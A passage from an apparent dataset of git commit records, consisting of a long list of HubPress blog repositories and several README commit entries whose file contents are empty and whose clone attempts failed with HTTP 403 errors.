x\/hubpress,tom-konda\/blog,hanwencheng\/hanwenblog,abhayghatpande\/hubpress.io,benignbala\/benignbala.hubpress.io,SockPastaRock\/hubpress.io,natsu90\/hubpress.io,cherurg\/hubpress.io,benignbala\/hubpress.io,clear-project\/blog,JacobSamro\/blog,liyucun\/blog,lauesa\/Blog,Red5\/red5.github.io,TeksInHelsinki\/en,flug\/flug.github.io,mimiz\/mimiz.github.io,Port666\/hubpress.io,nthline\/hubpress.io,juhuntenburg\/gsoc2017,erramuzpe\/gsoc2016,fghhfg\/hubpress.io,hang-h\/hubpress.io,mcornell\/OFM,Lukas238\/the-holodeck,mimiz\/mimiz.github.io,envyen\/blog,jsiu22\/blog,baocongchen\/blogs,seturne\/hubpress.io,pepite\/hubpress.io,jlcurty\/jlcurty.github.io-,Cribstone\/humblehacker,jabbytechnologies\/blog,mcrotty\/hubpress.io,nthline\/hubpress.io,aspick\/hubpress.io,pdudits\/pdudits.github.io,hiun\/hubpress.io,alexhanschke\/hubpress.io,ErJ101\/hbspractise,benignbala\/benignbala.hubpress.io,mrfgl\/blog,Evolution2626\/blog,ditirambo\/ditirambo.es,lichengzhu\/blog,yaks-all-the-way-down\/hubpress.github.io,kobusb\/blog,jamarortiz\/pragmaticalware,kim0\/hubpress.io,rh0\/the-myriad-path,ditirambo\/ditirambo.es,DimShadoWWW\/blog,jmini\/hubpress.io,HubPress\/demo.hubpress.io,OlympusOnline2\/announcements,Astrokoala-Studio\/hubpress.io,Sth0nian\/hubpress.io,manelvf\/blog,DaOesten\/hubpress.io,willcrisis\/www.willcrisis.com,rrrhys\/blog.codeworkshop.com.au,Perthmastersswimming\/hubpress.io,AnassKartit\/anasskartit.github.io,blackGirlsCode\/blog,jcsirot\/hubpress.io,adjiebpratama\/press,alexhanschke\/hubpress.io,Kyrzo\/kyrzo.github.io,duggiemitchell\/JavascriptMuse,isaacriquelme\/endata.do,philippevidal80\/blog,ncomet\/asciiblog,anshu92\/blog,sharmivssharmi\/sharmipress,AnassKartit\/anasskartit.github.io,adjiebpratama\/press,harichen\/harichen.io,blackGirlsCode\/blog,yangsheng1107\/hubpress.io,crotel\/meditation,leomedia\/blog,schweitzer\/hubpress.io,mcrotty\/hubpress.io,entropyz\/blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,tedbergeron\/hubpress.io,fbridault\/sandblog,gilangdanu\/blog,AirHacX\/blog.airhacx.com,adamperer\/diary,DaOesten\/hubpress.io,kornel661\/blog-test-jm,aql\/hubpress.io,btsibr\/myhubpress,jiashengc\/blog,moonPress\/press.io,lawrencetaylor\/hubpress.io,whelamc\/life,pej\/hubpress.io,setupminimal\/blog,victorcouste\/blog,juhuntenburg\/gsoc20
17,sebprev\/blog,shunkou\/blog,RussellSnyder\/hubpress-test,elinep\/blog,Nepal-Blockchain\/danphe-blogs,baocongchen\/blogs,setupminimal\/blog,TeksInHelsinki\/en,sxgc\/blog,hanwencheng\/Undepth,sharmivssharmi\/sharmipress,alexhanschke\/hubpress.io,koter84\/blog,mrtrombley\/blog,akhmetgali\/hubpress.io,mgreau\/posts,ludolphus\/hubpress.io,Adyrhan\/adyrhan.github.io,gsha0\/hubpress.io,eimajenthat\/hubpress.io,thaibeouu\/blog,jbutz\/hubpress-test,crotel\/meditation,rorohiko21\/blog,rubyinhell\/hubpress.io,berryzed\/tech-blog,DimShadoWWW\/blog,anwfr\/blog.anw.fr,qingyuqy\/qingyuqy.io,andreassiegelrfid\/hubpress.io,J0HDev\/blog,diodario\/hubpress.io,seturne\/hubpress.io,Nepal-Blockchain\/danphe-blogs,trangunghoa\/hubpress.io,ice09\/ice09ng,SockPastaRock\/hubpress.io,jfavlam\/Concepts,ReadyP1\/hubpress.io,SwarnaKishore\/blog,hinaloe\/hubpress,pramodjg\/articles,christofmarti\/blog,tmdgus0118\/blog.code404.co.kr,yaks-all-the-way-down\/hubpress.github.io,ErJ101\/hbspractise,anthonny\/personal-blog,mufarooqq\/blog,IEEECompute\/blog,ruaqiwei23\/blog,ReadyP1\/hubpress.io,Adyrhan\/adyrhan.github.io,mrtrombley\/blog,baocongchen\/blogs,xinmeng1\/note,diodario\/hubpress.io,ssundarraj\/hubpress.io,AlexL777\/hubpressblog,miroque\/shirokuma,jiashengc\/blog,flug\/flug.github.io,alexknowshtml\/thebigmove,sanctumware\/hubpress,rjhbrunt\/hubpress.io,cmhgroupllc\/blog,jlmcgehee21\/nooganeer,princeminz\/blog,sakkemo\/blog,hang-h\/hubpress.io,hiun\/hubpress.io,amberry\/blog,akhmetgali\/hubpress.io,JohanBrunet\/hubpress.io,josegomezr\/blog,kobusb\/blog,wzzrd\/hubpress.io,sakkemo\/blog,dsuryakusuma\/dsuryakusuma.github.io,Astrokoala-Studio\/hubpress.io,Bloggerschmidt\/bloggerschmidt.de,josegomezr\/blog,Perthmastersswimming\/hubpress.io,palaxi00\/palaxi00.github.io,diodario\/hubpress.io,lawrencetaylor\/hubpress.io,redrabbit-calligraphy\/redrabbit-calligraphy-blog,Nepal-Blockchain\/danphe-blogs,discimport\/blog.discimport.dk,tmdgus0118\/blog.code404.co.kr,trangunghoa\/hubpress.io,alexknowshtml\/thebigmove,rynop\/rynop.hubpress.io,gbougeard\/blog.english,jpcanovas\/myBlog,amberry\/blog,fbridault\/sandblog,filipeuva\/filipeuva.blog,laibaogo\/hubpress.io,sharmivssharmi\/sharmipress,metadevfoundation\/metadevfoundation.github.io,julianrichen\/blog,mgreau\/posts,brendena\/hubpress.io,ciena-blueplanet\/developers.blog,AnassKartit\/anasskartit.github.io,mrtrombley\/blog,christofmarti\/blog,lrabiet\/patisserie,jabbytechnologies\/blog,sillyleo\/bible.notes,hanwencheng\/Undepth,apoch\/blog,iKnowMagic\/hubpress.io,binout\/javaonemorething,SnorlaxH\/blog.urusa.me,hinaloe\/hubpress,aspick\/hubpress.io,hanwencheng\/hanwenblog,jmnarloch\/blog.io,simpleHoChun\/blog,iKnowMagic\/hubpress.io,abhayghatpande\/hubpress.io,abesn\/hubpress.io,moonPress\/press.io,lauesa\/Blog,jcsirot\/hubpress.io,gsha0\/hubpress.io,Adyrhan\/adyrhan.github.io,lawrencetaylor\/hubpress.io,ditirambo\/ditirambo.es,agentmilindu\/hubpress.io,arabindamoni\/hubpress.io,envyen\/blog,trycrmr\/hubpress.io,DavidTPate\/davidtpate.com,mufarooqq\/blog,vuthaihoc\/vuthaihoc.github.io,agentmilindu\/hubpress.io,anandjagadeesh\/blog,mikqi\/blog,dawn-chiniquy\/clear-project.org,semarium\/blog,yangsheng1107\/hubpress.io,ml4den\/hubpress,jiashengc\/blog,aql\/hubpress.io,timofei7\/onroutenow,cherurg\/hubpress.io,Evolution2626\/blog,mcornell\/OFM,gbougeard\/blog.english,adest\/press,fwalloe\/infosecbriefly,jerometambo\/blog,IEEECompute\/blog,PerthHackers\/blog,mrfgl\/blog,xinmeng1\/note,Bloggerschmidt\/bloggerschmidt.de,igovsol\/blog,AirHacX\/blog.airhacx.com,booleanbalaji\/hubpress.io,
binout\/javaonemorething,mikqi\/blog,hva314\/blog,brieb\/hubpress.io,anandjagadeesh\/blog,mrtrombley\/blog,rjhbrunt\/hubpress.io,roelvs\/hubpress.io,shinnoki\/hubpress.io,pdudits\/pdudits.github.io,AirHacX\/blog.airhacx.com,mairandomness\/randomblog,PerthHackers\/blog,nicolaschaillot\/pechdencouty,nicksam112\/nicksam112.github.io,mgreau\/posts,shunkou\/blog,qingyuqy\/qingyuqy.io,mikqi\/blog,sebarid\/pages,pdudits\/pdudits.github.io,joshuarrrr\/hubpress.io,JohanBrunet\/hubpress.io,crotel\/meditation,Evolution2626\/blog,AnassKartit\/anasskartit.github.io,sidorares\/sidorares.github.io,fghhfg\/hubpress.io,pramodjg\/articles,atomfrede\/shiny-adventure,jimmidyson\/testblog,OlympusOnline2\/announcements,danen-carlson\/blog,juhuntenburg\/gsoc2017,ruaqiwei23\/blog,codetricity\/journey,chackomathew\/blog,arseniuss\/blog.arseniuss.id.lv,woehrl01\/woehrl01.hubpress.io,itsmyr4bbit\/blog,mathieu-pousse\/hubpress.io,DavidTPate\/davidtpate.com,adamperer\/diary,topicusonderwijs\/topicusonderwijs.github.io,igovsol\/blog,hva314\/blog,csiebler\/hubpress-test,crotel\/studio,sillyleo\/bible.notes,pascalgrimaud\/hubpress.io,brieb\/hubpress.io,msavy\/rhymewithgravy.com,lrabiet\/patisserie,cmolitor\/blog,mrfgl\/blog,rorosaurus\/hubpress.io,xinmeng1\/note,palaxi00\/palaxi00.github.io,laibaogo\/hubpress.io,gilangdanu\/blog,sebarid\/pages,tmdgus0118\/blog.code404.co.kr,ambarishpande\/blog,miroque\/shirokuma,mimiz\/mimiz.github.io,msavy\/rhymewithgravy.com,andreassiegelrfid\/hubpress.io,jjmean2\/server-study,ml4den\/hubpress,willcrisis\/www.willcrisis.com,sharmivssharmi\/sharmipress,victorcouste\/blog,jbutz\/hubpress-test,brieb\/hubpress.io,trangunghoa\/hubpress.io,marksubbarao\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,btsibr\/myhubpress,tom-konda\/blog,kornel661\/blog-test-jm,hinaloe\/hubpress,kornel661\/blog-test-jm,dmacstack\/glob,Nepal-Blockchain\/danphe-blogs,jerometambo\/blog,redrabbit-calligraphy\/redrabbit-calligraphy-blog,josegomezr\/blog,yhikishima\/hubpress,MinxianLi\/hubpress.io,palaxi00\/palaxi00.github.io,ciena-blueplanet\/developers.blog,koter84\/blog,yelangya3826850\/monaenhubpress,vuthaihoc\/vuthaihoc.github.io,JohanBrunet\/hubpress.io,matthardwick\/hubpress.io,rorosaurus\/hubpress.io,mkc188\/hubpress.io,lauesa\/Blog,discimport\/blog.discimport.dk,yelangya3826850\/monaenhubpress,dsuryakusuma\/dsuryakusuma.github.io,Perthmastersswimming\/hubpress.io,mcrotty\/hubpress.io,harichen\/harichen.io,fw4spl-org\/fw4spl-blog,ssundarraj\/hubpress.io,freekrai\/hubpress,jerometambo\/blog,elinep\/blog,julianrichen\/blog,DaOesten\/hubpress.io,BenBals\/hubpress,Lukas238\/the-holodeck,sanctumware\/hubpress,pdudits\/hubpress,shunkou\/blog,nicolaschaillot\/pechdencouty,hutchr\/hutchr.github.io,MirumSG\/agencyshowcase,MirumSG\/agencyshowcase,AlexL777\/hubpressblog,mathieu-pousse\/hubpress.io,imukulsharma\/imukulsharma.github.io,koter84\/blog,201507\/blog,schweitzer\/hubpress.io,simonturesson\/hubpresstestsimon,artavels\/pages,ashalkhakov\/hubpress.io,laibaogo\/hubpress.io,hiun\/hubpress.io,gsha0\/hubpress.io,itsmyr4bbit\/blog,wzzrd\/hubpress.io,ncomet\/asciiblog,wzzrd\/hubpress.io,sebprev\/blog,akhmetgali\/hubpress.io,JiajiaGuo\/jiajiaguo.github.io,tedbergeron\/hubpress.io,arabindamoni\/hubpress.io,nicolaschaillot\/pechdencouty,roelvs\/hubpress.io,blackGirlsCode\/blog,brendena\/hubpress.io,mkc188\/hubpress.io,rynop\/rynop.hubpress.io,gbougeard\/blog.english,ambarishpande\/blog,benignbala\/benignbala.hubpress.io,cmolitor\/blog,laibaogo\/hubpress.io,atomfrede\/shiny-adventure,eimajenthat\/hubpress.io,dan-blanch
ard\/blog,ciena-blueplanet\/developers.blog,chackomathew\/blog,setupminimal\/blog,gsha0\/hubpress.io,erramuzpe\/gsoc2016,lawrencetaylor\/hubpress.io,Codearte\/hubpress.io,loetjoe\/blog,philippevidal80\/blog,magivfer\/pages,nandansaha\/AroundTheWeb,JacobSamro\/blog,tedbergeron\/hubpress.io,arseniuss\/blog.arseniuss.id.lv,andreassiegelrfid\/hubpress.io,miroque\/shirokuma,dmacstack\/glob,crotel\/studio,csiebler\/hubpress-test,willcrisis\/www.willcrisis.com,anshu92\/blog,mcrotty\/hubpress.io,seturne\/hubpress.io,ottoandry\/ottoandry1,mkent-at-rivermeadow-dot-com\/hubpress.io,freekrai\/hubpress,sebarid\/pages,mkent-at-rivermeadow-dot-com\/hubpress.io,simonturesson\/hubpresstestsimon,jlcurty\/jlcurty.github.io-,natsu90\/hubpress.io,matthardwick\/hubpress.io,jsiu22\/blog,semarium\/blog,joescharf\/joescharf.github.io,pdudits\/hubpress,Kyrzo\/kyrzo.github.io,thaibeouu\/blog,JohanBrunet\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,moonPress\/press.io,RussellSnyder\/hubpress-test,201507\/blog,liyucun\/blog,corporatesanyasi\/corporatesanyasi.github.io,mkent-at-rivermeadow-dot-com\/hubpress.io,hanwencheng\/Undepth,msavy\/rhymewithgravy.com,SwarnaKishore\/blog,jmnarloch\/blog.io,sebprev\/blog,simonturesson\/hubpresstestsimon,JiajiaGuo\/jiajiaguo.github.io,harichen\/harichen.io,mairandomness\/randomblog,arabindamoni\/hubpress.io,mairandomness\/randomblog,demiansan\/demiansan.github.io,abesn\/hubpress.io,nicksam112\/nicksam112.github.io,plyom\/hubpress.io,aql\/hubpress.io,agentmilindu\/hubpress.io,dmacstack\/glob,dawn-chiniquy\/clear-project.org,fwalloe\/infosecbriefly,YvonneZhang\/yvonnezhang.github.io,lauesa\/Blog,OdieD8\/hubpress.io,sillyleo\/bible.notes,melix\/hubpress,errorval\/blog,jimmidyson\/testblog,joshuarrrr\/hubpress.io,AlexL777\/hubpressblog,abesn\/hubpress.io,mgreau\/posts,kobusb\/blog,Jason2013\/hubpress,flug\/flug.github.io,jpcanovas\/myBlog,ucide-coruptia\/ucide-coruptia.ro,thaibeouu\/blog,OdieD8\/hubpress.io,yaks-all-the-way-down\/hubpress.github.io,imukulsharma\/imukulsharma.github.io,leomedia\/blog,cherurg\/hubpress.io,brendena\/hubpress.io,ciena-blueplanet\/developers.blog,Jason2013\/hubpress,julianrichen\/blog,puff-tw\/hubpress.io,iKnowMagic\/hubpress.io,nicksam112\/nicksam112.github.io,josegomezr\/blog,jerometambo\/blog,pascalgrimaud\/hubpress.io,metadevfoundation\/metadevfoundation.github.io,juhuntenburg\/gsoc2017,imukulsharma\/imukulsharma.github.io,rorosaurus\/hubpress.io,fbridault\/sandblog,ashalkhakov\/hubpress.io,ml4den\/hubpress,kornel661\/blog-test-jm,discimport\/blog.discimport.dk,MinxianLi\/hubpress.io,kim0\/hubpress.io,berryzed\/tech-blog,timofei7\/onroutenow,manelvf\/blog,willcrisis\/www.willcrisis.com,loetjoe\/blog,rjhbrunt\/hubpress.io,topluluk\/blog,pdudits\/hubpress,SockPastaRock\/hubpress.io,puff-tw\/hubpress.io,moonPress\/press.io,lrabiet\/patisserie,simpleHoChun\/blog,joescharf\/joescharf.github.io,matthardwick\/hubpress.io,ErJ101\/hbspractise,J0HDev\/blog,Cribstone\/humblehacker,topluluk\/blog,rorohiko21\/blog,hva314\/blog,tehbilly\/blog,rorosaurus\/hubpress.io,bemug\/devblog,rynop\/rynop.hubpress.io,atomfrede\/shiny-adventure,leomedia\/blog,PerthHackers\/blog,princeminz\/blog,cmhgroupllc\/blog,shinnoki\/hubpress.io,clear-project\/blog,fastretailing\/blog,jlmcgehee21\/nooganeer,metadevfoundation\/metadevfoundation.github.io,Jason2013\/hubpress,fwalloe\/infosecbriefly,clear-project\/blog,magivfer\/pages,jlmcgehee21\/nooganeer,gscheibel\/blog,victorcouste\/blog,tom-konda\/blog,dsuryakusuma\/dsuryakusuma.github.io,msavy\/rhymewithgravy.com,Codearte\/hubp
ress.io,celsogg\/blog,duggiemitchell\/JavascriptMuse,wzzrd\/hubpress.io,sanctumware\/hubpress,danen-carlson\/blog,Astrokoala-Studio\/hubpress.io,ludolphus\/hubpress.io,topicusonderwijs\/topicusonderwijs.github.io,celsogg\/blog,Evolution2626\/blog,josegomezr\/blog,seturne\/hubpress.io,ottoandry\/ottoandry1,Abdul2\/abdul2.github.io,artavels\/pages,erramuzpe\/gsoc2016,magivfer\/pages,ambarishpande\/blog,fghhfg\/hubpress.io,hang-h\/hubpress.io,yangsheng1107\/hubpress.io,christofmarti\/blog,setupminimal\/blog,timofei7\/onroutenow,heartnn\/hubpress.io,thesagarsutar\/hubpress,elinep\/blog,cmolitor\/blog,puff-tw\/hubpress.io,andreassiegelrfid\/hubpress.io,discimport\/blog.discimport.dk,ucide-coruptia\/ucide-coruptia.ro,arseniuss\/blog.arseniuss.id.lv,berryzed\/tech-blog,eimajenthat\/hubpress.io,Codearte\/hubpress.io,thesagarsutar\/hubpress,plyom\/hubpress.io,rorohiko21\/blog,fastretailing\/blog,apoch\/blog,pepite\/hubpress.io,hinaloe\/hubpress,jpcanovas\/myBlog,magivfer\/pages,ssundarraj\/hubpress.io,jjmean2\/server-study,marksubbarao\/hubpress.io,pascalgrimaud\/hubpress.io,adest\/press,Red5\/red5.github.io,devananda\/devananda.github.io,OlympusOnline2\/announcements,fw4spl-org\/fw4spl-blog,igovsol\/blog,erramuzpe\/gsoc2016,porolakka\/hubpress.io,amberry\/blog,paolo215\/blog,palaxi00\/palaxi00.github.io,bemug\/devblog,shunkou\/blog,akhmetgali\/hubpress.io,SockPastaRock\/hubpress.io,rynop\/rynop.hubpress.io,joescharf\/joescharf.github.io,mkc188\/hubpress.io,lichengzhu\/blog,DimShadoWWW\/blog,Sth0nian\/hubpress.io,hanwencheng\/hanwenblog,pej\/hubpress.io,marksubbarao\/hubpress.io,demiansan\/demiansan.github.io,PerthHackers\/blog,topicusonderwijs\/topicusonderwijs.github.io,benignbala\/hubpress.io,jbutz\/hubpress-test,mufarooqq\/blog,heartnn\/hubpress.io,btsibr\/myhubpress,heartnn\/hubpress.io,mcornell\/OFM,RussellSnyder\/hubpress-test,crobby\/hubpress.io,benignbala\/hubpress.io,gscheibel\/blog,henryouly\/henryouly.github.io,dmacstack\/glob,loetjoe\/blog,celsogg\/blog,apoch\/blog,tom-konda\/blog,BenBals\/hubpress,joshuarrrr\/hubpress.io,jbutz\/hubpress-test,miroque\/shirokuma,jmnarloch\/blog.io,nandansaha\/AroundTheWeb,melix\/hubpress,nthline\/hubpress.io,isaacriquelme\/endata.do,vuthaihoc\/vuthaihoc.github.io,jfavlam\/Concepts,gogonkt\/makenothing,woehrl01\/woehrl01.hubpress.io,sxgc\/blog,DavidTPate\/davidtpate.com,flug\/flug.github.io,arabindamoni\/hubpress.io,dsuryakusuma\/dsuryakusuma.github.io,booleanbalaji\/hubpress.io,ruaqiwei23\/blog,porolakka\/hubpress.io,mufarooqq\/blog,errorval\/blog,aql\/hubpress.io,benignbala\/hubpress.io,Sth0nian\/hubpress.io,mrfgl\/blog,e-scape\/blog,gogonkt\/makenothing,dan-blanchard\/blog,e-scape\/blog,topluluk\/blog,joescharf\/joescharf.github.io,jamarortiz\/pragmaticalware,ben-liu\/hubpress.io,anwfr\/blog.anw.fr,ReadyP1\/hubpress.io,itsmyr4bbit\/blog,pej\/hubpress.io,fw4spl-org\/fw4spl-blog,qingyuqy\/qingyuqy.io,gbougeard\/blog.english,ncomet\/asciiblog,sebarid\/pages,roelvs\/hubpress.io,TeksInHelsinki\/en,jlcurty\/jlcurty.github.io-,nandansaha\/AroundTheWeb,codelab-lbernard\/blog,pepite\/hubpress.io,agentmilindu\/hubpress.io,nicolaschaillot\/pechdencouty,aspick\/hubpress.io,berryzed\/tech-blog,freekrai\/hubpress,jjmean2\/server-study,whelamc\/life,rubyinhell\/hubpress.io,JiajiaGuo\/jiajiaguo.github.io,isaacriquelme\/endata.do,adest\/press,joshuarrrr\/hubpress.io,Lukas238\/the-holodeck,porolakka\/hubpress.io,e-scape\/blog,cmhgroupllc\/blog,jamarortiz\/pragmaticalware,Abdul2\/abdul2.github.io,mikqi\/blog,nandansaha\/AroundTheWeb,christofmarti\/blog,entropyz\/blog,lra
biet\/patisserie,plyom\/hubpress.io,princeminz\/blog,SwarnaKishore\/blog,Perthmastersswimming\/hubpress.io,ucide-coruptia\/ucide-coruptia.ro,entropyz\/blog,SnorlaxH\/blog.urusa.me,kobusb\/blog,filipeuva\/filipeuva.blog,yelangya3826850\/monaenhubpress,RaoUmer\/hubpress.io,crobby\/hubpress.io,pramodjg\/articles,danen-carlson\/blog,RussellSnyder\/hubpress-test,dawn-chiniquy\/clear-project.org,sxgc\/blog,fwalloe\/infosecbriefly,artavels\/pages,Jekin6\/blog,dan-blanchard\/blog,Abdul2\/abdul2.github.io,philippevidal80\/blog,plyom\/hubpress.io,jimmidyson\/testblog,ottoandry\/ottoandry1,bemug\/devblog,sidorares\/sidorares.github.io,abhayghatpande\/hubpress.io,nicksam112\/nicksam112.github.io,RaoUmer\/hubpress.io,porolakka\/hubpress.io,tehbilly\/blog,manelvf\/blog,corporatesanyasi\/corporatesanyasi.github.io,thesagarsutar\/hubpress,lichengzhu\/blog,anthonny\/personal-blog,ErJ101\/hbspractise,henryouly\/henryouly.github.io,marksubbarao\/hubpress.io,brendena\/hubpress.io,crobby\/hubpress.io,trycrmr\/hubpress.io,Bloggerschmidt\/bloggerschmidt.de,ambarishpande\/blog,gogonkt\/makenothing,hutchr\/hutchr.github.io,rorohiko21\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,adjiebpratama\/press,qingyuqy\/qingyuqy.io,shinnoki\/hubpress.io,ice09\/ice09ng,crobby\/hubpress.io,celsogg\/blog,iKnowMagic\/hubpress.io,Kyrzo\/kyrzo.github.io,paolo215\/blog,BenBals\/hubpress,booleanbalaji\/hubpress.io,philippevidal80\/blog,topicusonderwijs\/topicusonderwijs.github.io,DavidTPate\/davidtpate.com,SnorlaxH\/blog.urusa.me,jsiu22\/blog,crotel\/studio,ludolphus\/hubpress.io,cmhgroupllc\/blog,ditirambo\/ditirambo.es,rh0\/the-myriad-path,DaOesten\/hubpress.io,pdudits\/hubpress,anshu92\/blog,thaibeouu\/blog,julianrichen\/blog,IEEECompute\/blog,abesn\/hubpress.io,ice09\/ice09ng,Jekin6\/blog,ncomet\/asciiblog,arseniuss\/blog.arseniuss.id.lv,jcsirot\/hubpress.io,fghhfg\/hubpress.io,JacobSamro\/blog,artavels\/pages,SnorlaxH\/blog.urusa.me,OdieD8\/hubpress.io,pramodjg\/articles,entropyz\/blog,xinmeng1\/note,devananda\/devananda.github.io,palaxi00\/palaxi00.github.io,crotel\/studio,princeminz\/blog,MirumSG\/agencyshowcase,Port666\/hubpress.io,palaxi00\/palaxi00.github.io,sakkemo\/blog,anandjagadeesh\/blog,sanctumware\/hubpress,liyucun\/blog,chackomathew\/blog,anthonny\/personal-blog,simonturesson\/hubpresstestsimon,binout\/javaonemorething,anthonny\/personal-blog,pepite\/hubpress.io,schweitzer\/hubpress.io,anwfr\/blog.anw.fr,jmini\/hubpress.io,hutchr\/hutchr.github.io,paolo215\/blog,nthline\/hubpress.io,heartnn\/hubpress.io,loetjoe\/blog,binout\/javaonemorething,sebprev\/blog,atomfrede\/shiny-adventure,ben-liu\/hubpress.io,chackomathew\/blog,ashalkhakov\/hubpress.io,hva314\/blog,jjmean2\/server-study,HubPress\/demo.hubpress.io,codetricity\/journey,ml4den\/hubpress,jfavlam\/Concepts,adamperer\/diary,alexknowshtml\/thebigmove,devananda\/devananda.github.io,simpleHoChun\/blog,pdudits\/pdudits.github.io,tmdgus0118\/blog.code404.co.kr,igovsol\/blog,IEEECompute\/blog,errorval\/blog,gscheibel\/blog,cmolitor\/blog,hiun\/hubpress.io,RaoUmer\/hubpress.io,anandjagadeesh\/blog,ottoandry\/ottoandry1,elinep\/blog,gilangdanu\/blog,eimajenthat\/hubpress.io,Jekin6\/blog,duggiemitchell\/JavascriptMuse,semarium\/blog,jcsirot\/hubpress.io,codelab-lbernard\/blog,OdieD8\/hubpress.io,kim0\/hubpress.io,koter84\/blog,palaxi00\/palaxi00.github.io,codetricity\/journey,filipeuva\/filipeuva.blog,rubyinhell\/hubpress.io,btsibr\/myhubpress,lichengzhu\/blog,Cribstone\/humblehacker,tehbilly\/blog,AlexL777\/hubpressblog,demiansan\/demiansan.github.io,woehrl01\/woehrl0
1.hubpress.io,mathieu-pousse\/hubpress.io,sxgc\/blog,manelvf\/blog,apoch\/blog,rrrhys\/blog.codeworkshop.com.au,adjiebpratama\/press,gogonkt\/makenothing,anwfr\/blog.anw.fr,alexknowshtml\/thebigmove,pej\/hubpress.io,Jekin6\/blog,Port666\/hubpress.io,Abdul2\/abdul2.github.io,anshu92\/blog,sakkemo\/blog,crotel\/meditation","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SockPastaRock\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b8815337290e2f4fee3592e62b97bc8303e4468","subject":"Create README.adoc","message":"Create README.adoc","repos":"MatousJobanek\/smart-testing,MatousJobanek\/smart-testing,arquillian\/smart-testing,arquillian\/smart-testing,arquillian\/smart-testing,MatousJobanek\/smart-testing","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MatousJobanek\/smart-testing.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c6d054a93f7079fa0aa9356a1c07b6831f832548","subject":"Add readme","message":"Add readme\n","repos":"ivargrimstad\/security-samples,ivargrimstad\/security-samples","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/security-samples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd3c4286fb1e18c92c4ea254f6c82fc15a2fc02a","subject":"Update dependency list in README","message":"Update dependency list in README\n","repos":"rumpelsepp\/pynote","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rumpelsepp\/pynote.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ca1f40f1b231f42888b85806aca7cbbe0e64800","subject":"Remove comment","message":"Remove comment","repos":"prateepb\/spiracle,prateepb\/spiracle,waratek\/spiracle,waratek\/spiracle,waratek\/spiracle,prateepb\/spiracle","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateepb\/spiracle.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1000e0f4c6b3de2aa4618f1eebf8a85cc9a0ed95","subject":"Create README.adoc","message":"Create README.adoc","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3df1ef5fdfea8eaffd1a6a6fae9ffc832b093c8","subject":"Updated TravisCI badge","message":"Updated TravisCI badge","repos":"resilience4j\/resilience4j,resilience4j\/resilience4j,RobWin\/circuitbreaker-java8,mehtabsinghmann\/resilience4j,drmaas\/resilience4j,drmaas\/resilience4j,goldobin\/resilience4j,RobWin\/javaslang-circuitbreaker,javaslang\/javaslang-circuitbreaker","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL 
returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"83045d9f29d18412ce49a0ef668ace7130a855b3","subject":"Updated README credit URL","message":"Updated README credit URL\n\nNecessary to pick up new author profile URL.\n","repos":"bkuhlmann\/alfred","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/alfred.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1c7124741216c7a98c66b3a70208b0d808ca6201","subject":"doc: add man page for daniel-parse","message":"doc: add man page for daniel-parse\n\nSigned-off-by: brian m. carlson <738bdd359be778fee9f0fc4e2934ad72f436ceda@crustytoothpaste.net>\n","repos":"bk2204\/daniel-ruby,bk2204\/daniel-ruby","old_file":"doc\/daniel-parse.adoc","new_file":"doc\/daniel-parse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bk2204\/daniel-ruby.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"716f19409c6d83403db0d257ba82894fdf1d2cfa","subject":"Document --bind option in README","message":"Document --bind option in README","repos":"zorkian\/nagios-api,numkem\/nagios-api,numkem\/nagios-api,Webtrends\/nagios-api,Wikia\/nagios-api,heftyy\/nagios-api,zorkian\/nagios-api,heftyy\/nagios-api,al4\/nagios-api,al4\/nagios-api,Webtrends\/nagios-api,Wikia\/nagios-api","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/al4\/nagios-api.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"358d1b92c2b20bc03ca039d4ccbb8a6ff677f063","subject":"updated readme","message":"updated readme\n","repos":"S-Mach\/s_mach.datadiff","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/S-Mach\/s_mach.datadiff.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e271cf2ebda1c812db20e6db89b4b1f86e98e4e","subject":"Place link to godocs in README.","message":"Place link to godocs in 